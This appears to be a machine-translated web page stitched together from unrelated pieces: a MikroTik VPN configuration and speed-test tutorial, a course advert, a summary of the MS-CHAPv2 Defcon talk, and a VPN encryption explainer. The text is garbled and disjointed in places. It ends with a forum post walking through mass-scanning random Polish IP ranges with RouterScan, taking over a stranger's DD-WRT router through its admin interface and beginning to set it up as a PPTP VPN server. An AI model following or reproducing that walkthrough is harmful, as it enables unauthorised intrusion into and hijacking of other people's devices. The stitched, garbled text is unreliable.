Menu
Is free
registration
home  /  Navigators/ Can a VPN service be hacked? Detailed overview. How VPN encryption works

Can a VPN be hacked? Detailed overview. How VPN encryption works

A review article on the use of modern private tunnels in routers of a popular Latvian brand. I will talk about how to set up a vpn server in mikrotik based on technologies such as l2tp, ipsec, openvpn, pptp, gre and eoip. Along the way, I will briefly talk about what these technologies are, how they differ, as well as compare the performance of the microtic with all the specified tunnels.

This article is part of a single cycle of articles about.

Introduction

Immediately I want to draw your attention to the fact that this article will be more an overview than a transfer of real experience, since I myself most often use as vpn server... Nevertheless, we also had to deal with vpn in Mikrotik. Configured as pptp server for connection remote clients and l2tp for combining two or more microtics into a common private network. Mostly by default, without delving into the intricacies of the settings.

For those who want to be well versed in networks, but for some reason do not know how to do this yet, I recommend this series of articles - networks for the little ones.

Vpn server options in Mikrotik

With vpn server options in Mikrotik, everything is complicated :) In the sense that there are many vpn implementations, which are not so easy to choose if you do not understand in detail network technologies... I don't know much about them, but I think I catch the point a little. I will try to explain to you in my own words what the differences are.

There are 2 fundamentally different solutions for organizing connections between two microtics and external subscribers:

  1. Create l2 site-to-site tunnel with EOIP Tunnel... The simplest and quick way combine two microtics. If encryption is not used, then the fastest vpn connections will be obtained. Dedicated white ip addresses are required on both devices. Such connections are used to connect offices or branches via vpn. In general, it does not work through NAT. I will also add here GRE Tunnel although it works in l3 and uses routing, it works the same site-to-site.
  2. VPN connections of the l3 level on the Client-Server technology, such as PPTP, L2TP, SSTP, OpenVPN... Such connections are used both for combining offices and for connecting remote employees. Only one white IP address on the server side is enough to create vpn connections. Works through NAT.

I'll tell you a little more about each of the types of vpn connections separately.

  • GRE Tunnel - Uses the simple gre protocol to build a basic, unsecured site-to-site VPN. Developed by CISCO. Allows you to encapsulate packets of various types inside ip tunnels. In simple words that's what he does. It takes your data with all the headers, packs it into a packet, transmits it over the Internet to the other end, where this packet is parsed back into the original data. To end users of the network, it all looks like they are communicating over a local network.
  • EOIP Tunnel - Ethernet over IP is a proprietary MikroTik RouterOS protocol that creates an Ethernet tunnel between two routers over an IP connection. It uses the GRE protocol for data transfer. The fundamental difference between eoip tunnnel is that it works in l2 and transmits frames directly, while gre tunnel operates on packets and uses routing. I hope I explained correctly and did not lie. Why mikrotik decided to create their own tunnel implementation through the gre protocol, I don't know. Perhaps there are simply no similar solutions, so they came up with their own implementation.
  • PPTP stands for Point-to-Point Tunneling Protocol. For work uses the GRE protocol, supports encryption. At one time, pptp gained great popularity due to the fact that it was supported out of the box by Windows starting from version 95. Today, pptp is not recommended to use, as it is very easy to crack. The encryption key is obtained from the traffic dump in a short time (several hours) and all traffic is decrypted. Perhaps this can somehow be dealt with using different encryption protocols, but I did not understand this topic in detail. For myself, I decided that pptp can be used as the simplest solution where there are no increased security requirements and traffic decryption, if that happens, will not bring any problems. PPTP supports not only Windows but also Android out of the box, which is very convenient. It is very easy to set up.
  • L2TP - Layer 2 Tunneling Protocol. Despite the fact that the name indicates l2, in reality in the ip network it works on session level, that is, l3. It uses udp port 1701. It can work not only in IP networks. Out of the box, like pptp, it supports user authentication. Doesn't provide encryption by itself. It can use ipsec to encrypt traffic, which is considered very secure and does not have serious vulnerabilities. Currently supported by almost all devices and systems out of the box, just like pptp. Setting up is not much more difficult. In general, I recommend using this type of encrypted tunnel for organizing vpn.
  • OpenVPN is a very popular implementation of encrypted connections. The main advantage is the flexibility of settings. For example, a very cool feature of openvnp is to push routes directly to the client when connected. I have been using openvpn servers for a long time. When I first needed to pass a route to the pptp client, I could not figure out how to configure it. It turned out that in any way, he simply does not know how. I had to use third-party tools. Unfortunately, for some unknown reason, in mikrotik openvpn does not support the udp protocol, which greatly narrows the possibilities of using this vpn server. It works much slower on tcp than on udp. Compression of packet headers also does not work. So, in the general case, it makes no sense to use an openvpn server in Mikrotik, unless you need it for some specific reason.
  • SSTP - Secure Socket Tunneling Protocol - was introduced by Microsoft in Windows Vista SP1. The main advantage is that it is integrated into Windows, it can use port 443, which sometimes helps bypass firewalls. Considered very secure, uses SSL 3.0. Of the minuses, as far as I know, in Mikrotik it is very demanding on processor resources. On weak pieces of hardware, it will give out the lowest speed in comparison with all other vpn connections. For this reason, I will not consider it in my review at all.

From all that has been written, we can draw the following conclusion. In general, it is best to use vpn based on l2tp + ipsec in microtics. Main reasons:

  1. Simplicity and ease of customization.
  2. Strong encryption.
  3. Support for l2tp connections by almost all modern devices and systems. There is no need to install additional software.
  4. Suitable for both combining offices and remote employees - site-to-site and client-to-site connections.

If you need maximum performance without encryption, then build connections between networks or offices using the EOIP Tunnel - a proprietary development of Mikrotik.

Let's start configuring and testing vpn connections in mikrotik.

Configuring l2tp tunnel in mikrotik

First, let's set up a simple l2tp tunnel without encryption and measure the speed. To configure l2tp vpn in mikrotik, follow these steps.

We go to the section IP -> Pool and add a pool of ip addresses for the vpn tunnel.

Create a profile for the tunnel in PPP -> Profiles.

The other tabs have default settings. Next, we create a user in PPP -> Secrets.

Now we start the l2tp server. Go to PPP and press the button L2TP Server.

We set the settings for the l2tp server. do not enable ipsec yet.

VPN server is configured. Now let's create a persistent interface for it in order to create static routes based on it. Go to Interfaces and create.

Finishing touch. We create a static route with which subscribers local network servers will be able to connect to a local network subscriber behind a remote router via vpn. Go to IP -> Routes and add a route.

We add a static route so that the clients of this router know where to contact subscribers of the remote local network for vpn.

That's all. We configured l2tp on a remote microtic and thus connected 2 local networks using vpn. In the list of ip addresses with an active l2tp connection on the server and client, you should see the ip addresses from the range specified on the server for the vpn network - 10.10.5.1-10.10.5.100. Now you can ping opposite networks from both networks.

I have laptops connected to both microtics for the test. Now I will measure the connection speed using iperf3. Behind the router m-remote on the laptop 10.30.1.254 I start the server, and on 10.20.1.3 the agent. We start the test of the speed of the vpn connection:

average speed 194 Mbps... Frankly speaking, I did not understand why such a low speed. My test bench is assembled on two microtic routers and a gigabit microtic switch between them. Expected to see something around 500 Mbps. Let me remind you that the tunnel is not encrypted yet. At the same time, the load of processors on routers was in the region of 90-95%. That is, in fact, the ceiling of these pieces of iron.

Now let's try to enable ipsec encryption and measure the speed with it.

Configuring ipsec

With ipsec setup for l2tp, I got stuck for a while. There are many instructions on the net, but they are all outdated. As it turned out, in the latest firmware versions, launching ipsec in default settings is not easy, but very simple. To do this, you just need to specify in the properties of the l2tp server Use IPsec- yes and set a password.

Everything required settings ipsec will be generated automatically. On the agent, do the same - enable ipsec encryption and specify a password.

After connecting the l2tp client, you will see similar lines in the log:

19:17:00 l2tp, ppp, info l2tp-out1: initializing ... 19:17:00 l2tp, ppp, info l2tp-out1: connecting ... 19:17:03 ipsec, info initiate new phase 1 (Identity Protection): 192.168.13.197<=>192.168.13.1 19:17:04 ipsec, info ISAKMP-SA established 192.168.13.197-192.168.13.1 spi: 407844c0ceb5d2ab: 46ce7ffb25495efd 19:17:07 l2tp, ppp, info l2tp-out1: authenticated 19:17:07 l2tp, ppp , info l2tp-out1: connected

In order to make sure that ipsec encryption is working, you can go to the section IP -> Ipsec -> Installed SAs and look at the counter of encrypted packets. If it grows, then everything is in order, the traffic is encrypted.

Ibid in the section Remote peers you can see the list of remote clients for which ipsec encryption works, see the algorithms used. All default ipsec settings live in this section. You can view them, change or add new profiles. By default, the sha1 authorization algorithm and AES encryption are used. You can change these parameters if you are familiar with the topic. I will not be clever, I did not dig the topic of encryption. Which algorithms are the fastest and most secure - I don't know.

Let's test the speed of the vpn connection l2tp + ipsec.

I got it like this - 26 Mbps average. In this case, the processor load is 100%. Not much. These pieces of iron are very poorly suited for encrypted channels. In these tests, they are not loaded with anything other than the test itself. In real conditions, the speed will be even lower.

We are finished with the vpn settings based on l2tp + ipsec. Let's continue configuring the rest of the vpn tunnels and compare their speed.

Configuring pptp server in mikrotik

Setting up a pptp server does not differ fundamentally from l2tp. The logic and sequence of actions is the same. First, we create a pool of addresses in IP -> Pool for vpn network. I will be using the same pool we created earlier.

This profile contains the default encryption settings for which it is disabled. Let's check first the speed of the vpn channel without them. Create a new user for the remote pptp connection.

Turn on the pptp server in the PPP section.

Now let's create in the Interface List PPTP Server Binding by analogy with the previous section.

And finally, add a static route to the remote network via pptp connection.

Setting up the pptp server is now complete. On the firewall, you will need to open the following things for incoming connections of the external interface:

  • TCP port 1723
  • GRE protocol

We go to configure the pptp client.

pptp client

We go to a remote router and set up a connection through the pptp client there. We go, as usual, to the section PPP and add PPTP Client... On the General tab, we do not touch anything, but on Dial Out we indicate the address of the pptp server and the username for connecting.

Add a static route to a remote office via a vpn tunnel.

All is ready. We activate pptp connection and try to ping addresses in the local network. You can make sure that encryption is disabled in the pptp connection status on the client.

Now let's check the speed of the vpn connection via pptp.

Same 194 Mbps that on unencrypted l2tp at 100% CPU load. In general, it was a little strange to see exactly the same numbers. I ran the tests several times, but the result was consistently the same everywhere. Without encryption, there is no difference in speed between l2tp and pptp connections.

Now let's enable encryption in pptp on the server and look at the speed. To do this, we explicitly indicate in the pptp profile so that encryption is used. Go to PPP -> Profiles and edit our profile.

Let's check the client's status that the encryption is working.

I'm testing the speed of a vpn connection via pptp with encryption enabled.

It turned out on average 71 Mbps... Not a bad result compared to ipsec encryption in l2tp. As I said earlier, the pptp server is well suited where encryption is either not needed at all, or the possibility is allowed that encrypted traffic will be decrypted. But at the same time, it is still closed with encryption and everyone passing by will not be able to see anything. At the very least, you need to take a dump of traffic and somehow select a key using a dictionary or brute force. I don’t know exactly how this is implemented in practice. Didn't study the question.

Let's move on to the openvpn server in Mikrotik. It is very curious to look at the speed tests of this type of vpn connections.

Configuring openvpn server in Mikrotik

There is nothing complicated in setting up an openvpn server on mikrotik, except for a nuance with certificates. To someone who has never worked with them, it may seem too confusing. In addition, microtic itself does not contain any means for creating server and client certificates. You must use third-party utilities. If you have a linux machine, you can use my instructions for.

If you don't have linux machines, but you are still set to raise the vpn tunnel using openvpn in microtik, then let's deal with the configuration further. First of all, we need an openvpn distribution for windows. You can download it from the link - https://openvpn.net/community-downloads/. We will be interested in Windows Installer.

We carry out the installation on behalf of the administrator and specify in the process a component called EasyRSA 2 Certificate Management Scripts.

Go to the directory C: \ Program Files \ OpenVPN... We transfer the folder from there easy-rsa somewhere else so that you do not have to constantly stumble over UAC, which will not allow you to work quietly in Program files. I moved to D: \ tmp \ easy-rsa... Rename the file vars.bat.sample v vars.bat... We open it for editing and bring it to something like the following.

For those who do not understand, these are just variables that I specified for my needs. Anything can be written there, it is not essential for our task. You can not change anything at all, but leave it as it is. Create a folder in the directory keys... Next, run command line from the administrator and move to the specified directory D: \ tmp \ easy-rsa.

We answer the questions asked and complete the creation of the root certificate. It will appear in the folder D: \ tmp \ easy-rsa \ keys... Next, create a certificate for the openvpn server with the command - build-key-server servername.

Now let's generate a certificate for the client. I only have one client in the form of a remote microtic. You create exactly as much as you need. We use the command build-key certificate_name.

With the creation of certificates finished. We all have them in the keys directory. On the microtic, which will act as an openvpn server, you need to transfer the files:

  • ca.crt
  • ovpnserver.crt
  • ovpnserver.key

We import certificates from the added files. Go to System -> Certificates and import first ca.crt, after ovpnserver.crt and ovpnserver.key.

It should look something like this. Now let's start setting up an openvpn server in mikrotik. Let's create a separate profile for it in PPP -> Profiles.

All settings are default. I use Ip Pool as the local and remote address, which I created at the very beginning of the l2tp configuration. Add a remote user for openvpn to PPP -> Secrets.

We go to the section PPP and click OVPN Server... We indicate the settings and the downloaded ca certificate.

This completes the configuration of the openvpn server in Mikrotik. By default, the encryption protocol will be used BF-128-CBC... It can be changed in the properties of the client, and the list of all supported ciphers in the properties of the vpn server.

For the specified setting of the openvpn server to work, you must open the incoming tcp port 1194 on the firewall. Now let's set up an openvpn client and test the connection speed through vpn based on openvpn.

openvpn client

To configure the openvpn client on mikrotik, you need to transfer the certificates generated in the previous step there. Specifically, these files are:

  • m-remote.crt
  • m-remote.key

We import, as well as on the server, the certificate from these files. Please note that there must be KT characters opposite the certificate name.

Now configures openvpn client. Go to PPP and add OVPN Client.

Add a static route to access the resources of the remote network behind the openvpn server.

All is ready. You can connect and test the speed of the vpn connection through openvpn.

It turned out on average 24 Mbps at 100% processor load. The result is comparable to l2tp + ipsec. I was a little surprised by the result. I thought it would be worse than l2tp, but in reality it's the same. Personally, I personally like the openvpn option more, although due to the limited openvpn settings in microtik, the advantages of openvpn are difficult to implement. Let me remind you that I tested it with BF-128-CBC encryption, that is, blowfish.

Here is the result with AES-128-CBC - 23 Mbps, about the same.

With client-server vpn implementations sorted out the server in mikrotik. Now let's look at the l2-vpn speed in the form of an eoip tunnel.

EOIP Tunnel + Ipsec Setup

Configure vpn network based on EOIP in Mikrotik. Here you need to understand one important difference from all the previous settings that we did earlier. The EOIP tunnel operates at the l2 level, that is, both network segments will consider themselves to be on the same physical network. The address space for both will be the same. In my example, this is 10.20.1.0/24. There should be only one DHCP server for both networks. In my case, it will stay on m-server.

We create an EOIP tunnel to m-server. Go to Interface list -> EoIP Tunnel and add a new one.

From the settings, it is enough to specify only the remote address of the second microtic. The new EoIP interface must be added to the local bridge along with the physical interfaces.

We go to the remote microtic and there we do everything the same, only we specify another Remote Address.

This is enough for the EoIP tunnel to work immediately. His condition will be RS.

On the second microtic, the EoIP interface must also be added to the local bridge with the rest of the interfaces.

The easiest way to check that everything is in order is to dhcp request to the m-slave ip address for the bridge interface. He should get an ip address from the dhcp server on the m-server, provided that there are no other dhcp servers on the network anymore. The same will happen with local machines on the network behind m-slave. They will receive ip addresses from the dhcp server to the m-server.

Now let's check the performance of such an EoIP-based vpn tunnel.

I show the maximum result that I got - 836 Mbps... For some reason, in different tests, the speed floated in the range between 600-850 Mbps. In order for the speed to change, it was necessary to disable and re-enable the EoIP interface. The speed is impressive. At the same time, the processor is not 100% loaded. That is bottleneck not him. It looks like I ran into network performance. Let me remind you that there is no encryption and traffic routing here. Direct l2 channel between two microtics via EoIP vpn.

Let's add Ipsec encryption to the EoIP tunnel and look at the speed. To do this, we change the channel settings on both microtics. Add Ipsec password and local addresses, disable Fast Path.

Online course "Network Engineer"

If you have a desire to learn how to build and maintain highly available and reliable networks, I recommend taking a look at the online course "Network Engineer" at OTUS. it author's program combined with remote practice on real equipment and an academic certificate from Cisco! Students gain practical skills in working on equipment using a remote online laboratory operating on the basis of a training partner - RTU MIREA: Cisco 1921, Cisco 2801, Cisco 2811 routers; switches Cisco 2950, ​​Cisco 2960. Course features:
  • The course contains two design works .;
  • Students are enrolled in the official Cisco Academy (OTUS, Cisco Academy, ID 400051208) and have access to all parts of the CCNA Routing and Switching course;
  • Students can take the exam and receive, along with the OTUS certificate, another course certificate "CCNA Routing and Switching: Scaling Networks";
Check yourself on the entrance test and see the program for details on.

Divide and Conquer: Guaranteed MS-CHAPv2 Hack

Alexander Antipov

At the twentieth Defcon conference, David Hulton and I made a presentation on the MS-CHAPv2 hack. This post provides a rough overview of what we covered in our talk.


At the twentieth Defcon conference, we David Hulton presented a presentation on the MS-CHAPv2 hack. This post provides a rough overview of what we covered in our talk.

Why MS-CHAPv2?

The first obvious question is why we went into MS-CHAPv2, given the long-standing feeling that the Internet shouldn't rely on this protocol. Unfortunately, even as an outdated protocol and the subject of widespread criticism, it continues to be used everywhere. Most notable is the use of MS-CHAPv2 over PPTP VPN. It is also used quite heavily in WPA2 Enterprise configurations, especially when relying on its mutual authentication properties. For our talk, we have compiled a list of hundreds of VPN providers that depend on PPTP. It includes notable examples such as iPredator, The Pirate Bay VPN, which is supposedly designed to protect communications from government surveillance.

We believe that MS-CHAPv2 remains so prevalent as previous investigators of potential protocol weaknesses have mainly focused on dictionary attacks. Combining this research limitation with the extremely wide number of clients that support the protocol and its compatibility with the OS, it becomes clear why this solution, which requires the least amount of body movements from the user, is so tempting.

Now what?

1) All users and providers of PPTP VPN solutions should immediately start migrating to another VPN protocol. PPTP traffic should be considered unencrypted.

2) Companies that rely on MS-CHAPv2 mutual authentication properties to connect to their WPA2 RADIUS servers should start migrating to an alternative solution immediately.

In many cases, large companies have chosen to use IPSEC-PSK over PPTP. While PPTP is now apparently hacked, IPSEC-PSK is probably even more vulnerable to a dictionary attack vector than PPTP ever was. PPTP at least requires an attacker to eavesdrop on active network traffic in order to launch an offline dictionary attack, whereas an IPSEC-PSK VPN in aggressive mode essentially issues hashes to any connecting attacker.

Given the solutions available today, deploying anything securely needs some certificate validation. This is either for OpenVPN configuration or for using IPSEC in certificate mode instead of PSK.

Virtual private network(Virtual Private Network, hereinafter simply VPN) allows you to create on the Internet, a secure virtual tunnel from one device to another... If you access the network through such a tunnel, then everyone else including your provider it becomes very difficult to keep track of your actions.

VPN services also help to replace your physical location with any other data, which allows you to access services that are blocked for users from certain regions by geography. Using a VPN allows you to protect the confidentiality (data remains secret) and integrity (data remains unchanged) messages transmitted over the network.

Connecting to a VPN is pretty straightforward. First, the user goes online, connecting to the provider's servers, then establishes a VPN connection with the VPN server using the client ( special program installed on the user's computer). The VPN service then receives the pages requested by the user and transmits them to him through a secure tunnel. This ensures that the user's data and privacy are protected when working online.

How does VPN encryption work?

VPN protocol is a set of rules for the transmission and encryption of data. Most VPN services provide their customers with several VPN protocols to choose from, the most common of which are Point to Point Tunnelling Protocol (PPTP), Layer Two Tunnelling Protocol (L2TP), Internet Protocol Security (IPSec), and OpenVPN (SSL / TLS) ).

There is no way to explain how VPNs protect user privacy without talking about encryption. VPN services use a special method of processing data (encryption) to make the data read (plain text) completely unreadable (cipher text) for anyone who can intercept it. The algorithm (cipher) determines how the encryption and decryption of data is carried out within the framework of a particular VPN protocol. VPN protocols use these cryptographic algorithms to encrypt your data and keep it confidential.

Each of these VPN protocols has its own strengths and weaknesses, depending on the respective cryptographic algorithm. Some VPN services allow users to choose one of the available ciphers themselves. There are three types of ciphers: symmetric, asymmetric and hashing.

Symmetric encryption uses the same key for both encryption and decryption of data. Asymmetric encryption uses two keys, one for encryption and the other for decryption. The table below compares these types of encryption with each other.

Parameter Symmetric encryption Asymmetric encryption
Keys One key for multiple entities One entity has a public key and the other has a private key
Key exchange Needed safe way sending and receiving keys The private key is kept by the owner, the public key is available to everyone else
Speed Easier and faster Harder and slower
Reliability Easier to hack Harder to hack
Scalability Good Even nicer
Usage To encrypt anything Keys and digital signatures only
Security options Ensuring confidentiality Ensuring confidentiality, authentication and rejection prevention
Examples of DES, Tipple DES, AES, Blowfish, IDEA, RC4, RC5 and RC6 RSA, ECC, DSA and Diffie-Hellman algorithm

Asymmetric cryptography comes to the rescue when you need to overcome the limitations inherent in symmetric cryptography (as shown in the table above). Whitfield Diffie and Martin Hellman were part of the first research group to work on improving symmetric encryption, and it was they who developed the asymmetric encryption algorithm known as Diffie - Hellman algorithm.

It is a popular cryptographic algorithm that underlies many VPN protocols, including HTTPS, SSH, IPsec, and OpenVPN. Using this algorithm, two parties, who have never met each other before, can discuss the private key even in cases where communication is carried out through an unsecured public network (for example, the Internet).

Hashing is one-way (irreversible) encryption used to protect the integrity of transmitted data. Many VPN protocols use hashing algorithms to validate messages sent over the VPN. Examples include MD5, SHA-1, and SHA-2. However, MD5 and SHA-1 are no longer considered secure.

VPN services can be hacked, but it is very, very difficult. If you don't use a VPN, your chances of being hit by hackers are much higher.

Can someone hack the VPN service?

VPN services remain one of the most reliable ways to protect users' online privacy. However, it must be remembered that anything can be hacked, especially if you are a valuable target and your enemies have enough strength, time and money. Fortunately, most casual VPN users are not such targets, and therefore are unlikely to attract too much attention.

To break a VPN connection, you need to break the encryption, and for this you must either take advantage of vulnerabilities in the system or algorithm, or steal the encryption key in one way or another. Cryptographic attacks are used by hackers and cryptanalysts to extract plain text from its encrypted version in the absence of an encryption key. However, cracking encryption requires a lot of computational resources and time - it can literally take years to solve such a problem.

They often try to steal the encryption key, and this is understandable: it is much easier than solving the cipher. This is the method hackers use in the first place. It all depends not only on mathematics alone, but on a combination of various factors, including technical tricks, computing power, cheating, judicial orders and backdoors, bribery and other dirty methods. And all because solving ciphers is a very difficult and resource-intensive task.

Known VPN vulnerabilities

The infamous Edward Snowden and specialists in computer security on more than one occasion, it has been claimed that the NSA (US National Security Agency) has cracked the encryption used to protect most Internet traffic, including VPN traffic. Snowden's material says the NSA decrypts VPN traffic by intercepting encrypted traffic and transmitting the data to powerful computers, which then return the key.

Computer security experts Alex Halderman and Nadia Heninger presented a compelling report that the NSA can indeed decrypt large volumes of HTTPS, SSH, and VPN traffic using a Logjam attack targeting the main uses of the Diffie algorithm. - Hellman.

The NSA owes its success to a vulnerability in the implementation of the Diffie-Hellman algorithm. The essence of this vulnerability is that encryption programs use standardized prime numbers. Halderman and Heninger argue that for several hundred million US dollars, a computer can be built that is powerful enough to decipher a single 1024-bit Diffie-Hellman cipher. It will take about a year to create such a computer, as for the amount required for this - from the point of view of the annual budget of the NSA, nothing is impossible in it.

Alas, it just so happens that not all prime numbers (less than 1024 bits) are commonly used in everyday encrypted applications - including VPNs. As a result, it becomes even easier to crack such algorithms. As Bruce Schneier stated, “The math is good, but it cannot be hacked. But the code is another matter. "

Should you keep using VPNs?

Halderman and Heninger advise VPNs to switch to 2048-bit or even more complex Diffie-Hellman encryption keys, and they have prepared a tutorial on how to use them with TLS. The Internet Engineering Task Force (IETF) also advises using newest versions protocols that require longer sequences of primes.

Hackers can break Diffie-Hellman encryption keys if they are shorter than or equal in length to 1024 bits (approximately 309 characters). Cracking 2048-bit keys will be a real problem for hackers! In other words, they will not be able to decrypt data protected by such keys for a very long time.

As for users, it should be noted that hackers do know about the vulnerabilities of VPN services and encryption protocols with which they steal and gain access to encrypted data. However, you are much better protected with VPNs than without them.. Your computer can be hacked, but it will be very expensive and time consuming. And yes, the less visible you are, the better protected you are.

As Snowden argues, “Encryption really helps. You can really rely on reliable and well-tuned encryption systems. " Accordingly, you should avoid VPN services that use predominantly SHA-1 or MD5 hashing algorithms, as well as PPTP or L2TP / IPSec protocols. It is worth choosing a VPN service that uses latest version OpenVPN(extremely secure option) or SHA-2. If you cannot determine for sure which of the encryption algorithms the service uses, look for this information in the user manual or contact the service customer support.

VPNs are your friends. Trust the encryption, don't doubt the math. Use VPNs as often as possible, try to make sure your exit points are also secure. This way you can stay safe even if your encrypted tunnel gets hacked.

@SooLFaa:
Without hesitation, I decided to take the recommendation literally.

Acquaintance and launch of the program.

Routers will be attacked not from my local machine, but from a specially rented remote VDS under Windows control. Double click left mouse button to transfer me to the Netherlands.


As the title says, RouterScan will act as the attack tool. To download the program, let's go to the Antichat forum. According to the author's assurance, you only need to download the program from there.

The program is portable, its installation consists in unpacking the downloaded archive into the specified folder.


By default, the program attacks routers on ports 80, 8080, 1080. I think this list is quite justified and does not require any additions or changes.
In addition, the program has the ability to connect additional modules
  • Router Scan (main)
  • Detect proxy servers
  • Use HNAP 1.0
  • SQLite Manager RCE
  • Hudson Java Servlet
  • phpMyAdmin RCE

and together with an attack on routers, "probe" all IPs in a given range.
But such a load of the program will significantly slow down its work, so we will not touch anything in this window. after all, the purpose of the attack is to access the WEB interface of one random router for writing an article.

It remains only to select the IP range for the attack and you can run the program.
We go to a site that provides IP ranges by country and as a victim we randomly choose Poland (the choice of country is random).


After the desired ranges are inserted into the corresponding program window, you can start the program.
The time spent on the process of hacking routers depends on the number of IPs in the selected range and can take quite a long time.
But to write an article, I only need one hacked router, on which it is possible to raise a VPN server. These models can be ASUS routers, Mikrotik or any other model with DD-WRT firmware... After a quick glance at the list of routers that appeared in the "Good Results" tab, it is easy to find that the models of the specified routers are in the list.

We raise the VPN server on the router.

For the role of the victim in this article, I chose a router running DD-WRT.

My choice is explained by the fact that the mentioned firmware provides the ability to use the router as a VPN server using the PPTP protocol, and more recently I devoted this protocol.

Copy the URL of the desired router into address bar browser and after loading the page we find ourselves in its WEB-interface with administrator rights.

In order for the router to play the role of a VPN server, you need to go to the Services tab - PPTP.